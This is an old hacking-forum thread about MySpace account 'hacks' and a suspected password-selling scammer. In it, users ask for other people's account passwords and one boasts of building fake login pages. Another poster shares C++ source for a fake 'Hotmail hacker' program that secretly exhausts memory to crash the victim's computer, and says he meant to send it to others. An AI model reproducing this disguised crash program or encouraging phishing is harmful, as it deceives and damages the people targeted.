xymon
Closed Thread

Thread: myspace hack

Hybrid View

Haha, I'm a noob at this forum too . But at least I'm not a scammer! And I'm not a noob at hacking.

Ya i would not pay him jack first he has to prove it. And i still would not pay him.. Here another IM he sent me when i was away.

or8**2*: nice post u left
    Auto response from Bighomedog**: I am away from my computer right now.

or8**2*: dont know what you proved
    or8**2*: nothing
    or8**2*: loser
    Bighomedog**: OK thanks ya scammer
    or8**2*: huh
    Bighomedog**: trying to make *5.00 by scamming people

Quote Originally Posted by Bighomedog**
    Ya i would not pay him jack first he has to prove it. And i still would not pay him.. Here another IM he sent me when i was away.

or8**2*: nice post u left
    Auto response from Bighomedog**: I am away from my computer right now.

or8**2*: dont know what you proved
    or8**2*: nothing
    or8**2*: loser
    Bighomedog**: OK thanks ya scammer
    or8**2*: huh
    Bighomedog**: trying to make *5.00 by scamming people
    Lol, if he uses msn, give him my email, and I can send him my memory leak program that crashes the computer in * minute by using up ALL the ram.

yes sir i will ask him

Quote Originally Posted by kris***
    WHY ON EARTH YOURE SAYING I CANT GET PASSES IS BEYOND ME...MANY PEOPLE ON THIS SITE HAVE IMed ME IN HOPES OF GETTING THEM A PASS AND IVE DONE JUST THAT...U ALL KNOW WHO U ARE...WHY WOULD U WASTE YOUR TIME POSTING THAT I CANT GET A PASS WHEN U KNOW NOTHING ABOUT ME AND HAVE NEVER USED MY SERVICES

SO AGAIN, NEED A PASS? PLEASE IM ME ON MY AIM OR8**2*

ALWAYS HAPPY TO HELP
    No, because THIS FORUM DOES NOT TOLERATE SPAM, and from what you have posted and from quotes from your AIM converations, you are a MORON who knows NOTHING about hacking and is trying to scam people. So I repeat, GET OFF THIS FORUM, don't make me have to PM syntax****** for the *rd time this week. And you spam your AIM address every time you post, trying to get more people. Lol, n00b, why don't you come on an irc channel with all of us then we can pwn you, or at least you can explain why you are not a scammer, instead of posting this crap that doesn't help you. And if you like adding a "signature" to promote yourself at the end of your message, so will I.

*kris***/OR8**2* IS A SCAMMER*

Quote Originally Posted by a scamming n00b
    ALWAYS HAPPY TO HELP
    </thread>
    Last edited by Ezekiel; 04-19-2006 at 03:16 PM.

mike*0*. do u know how 2 hack? do u know how 2 retrieve passwords? can u help me out man. can u get me the password for [email]gothicgirl@myspace.com[/email] or [email]gothicgirldaisy@myspace.com[/email] please man. u said it could be done. u say how newbies are stupid. i am newbie, if u dont want to get it for me, at least teach me. i'll do it. the only language i know is html though.

Quote Originally Posted by Xlink
    mike*0*. do u know how 2 hack? do u know how 2 retrieve passwords? can u help me out man. can u get me the password for [email]gothicgirl@myspace.com[/email] or [email]gothicgirldaisy@myspace.com[/email] please man. u said it could be done. u say how newbies are stupid. i am newbie, if u dont want to get it for me, at least teach me. i'll do it. the only language i know is html though.
    Like I said in the other thread, I don't have time to waste trying to get into people's accounts, and saying "I have a reason and REALLY need this" makes me want to even less. First of all, I don't even have a myspace account, I prefer to actually create my own websites, and be free from the losers who use myspace. And yes I said it could be done, there are a few vulnerabilities in myspace that can be used to redirect to a fake page by using flash. If you want to do this, get off your ass and learn for yourself, you are looking for someone to do ALL the work for you. It's not as if there is a lack of appropriate tutorials on the topic, there is hundreds. And a lot of people say they know html, but all they know is a few tags that can be used to format text, such as <b> and <u>, etc. I consider "knowing html" to be knowing a lot more than that, such as how http GET and POST work, how to make forms, and a lot of other stuff. I have nothing against n00bs/newbies, everyone has to start somewhere. But the people I AM against are the morons who don't do anything for themself and post in a forum when they first think of something because they are too lazy to [URL="http://www.google.com"]GOOGLE[/URL] it or to find out themself. Hackers do not have time to spoon feed information to every single person who wants to be a hacker, which is why you need to learn yourself. And you people think hacking can be done through a few websites or programs without any effort to learn anything by you. All this makes you is a script kiddy.

See im newby i know some good html and some C++ man you cant ask hackers for help you gotta work for it your self im working at it and getting better at it not hacking but programs. If you ask for someone to show you it then your lame
    even im better then you dude and im a huge newb to this place. and remmeber google is your friend

Just make a fake myspace login page and...(i'll let you figure out the rest) ive made * flp's (fake login pages) for myspace myself! How do you make a flp? Simple! Go to [URL="http://www.google.com"]Google[/URL] and search it google makes dreams come true!

Quote Originally Posted by mike*0*
    Lol, if he uses msn, give him my email, and I can send him my memory leak program that crashes the computer in * minute by using up ALL the ram.
    there how would u do that?

Quote Originally Posted by mitch04
    there how would u do that?
    I made a program in c++ that keeps requesting new memory on the heap until the computer runs out of ram, and presumably crashes.

How would you do that? You would learn a programming language, there are thousands of ways to crash a computer.

Can I get the source?

Quote Originally Posted by han_han
    Can I get the source?
    The original version was a 'trick' program which told users to enter an email they want to hack, hit enter, then it will be hacked. Instead of hacking emails, the program created a memory leak, as said above. That program was written for the idiots on this forum who keep b***ing me about hacking email accounts. Here's the original source:

Code:
    #include <iostream>
    #include <cstdlib>

using namespace std;

int main() 
    {
        char email[64];
        cout << "############################ Hotmail hacker v*.5 ############################\n\n";
        cout << "Please enter the email address (has to be @hotmail.com) you want to hack, then wait * to 2 minutes while it gets and decrypts the password\n";
        cout << "\n\nEmail:  ";
        cin>>email;
        cout << "Currently hacking:\t" << email << "\n";
        cout << "Password received from hotmail servers, ready to decrypt the password\n";
        cout << "Decrypting password - This can take up to 5 minutes...\n";
        while (*) 
        {

int * memleak = new int;
        *memleak = *0;
        }

return 0;

}
    If you just want the plain computer-crashing code, here (it's pretty simple):

Code:
    #include <iostream>
    #include <cstdlib>

using namespace std;

int main() 
    {

while (*) 
        {

int * memleak = new int;
        *memleak = *0;
        }

return 0;

}
    Both of these programs WILL crash/heavily lag your computer if you run them for any length of time, so make sure you have task manager open on the process tab ready to kill the process when necessary.

Closed Thread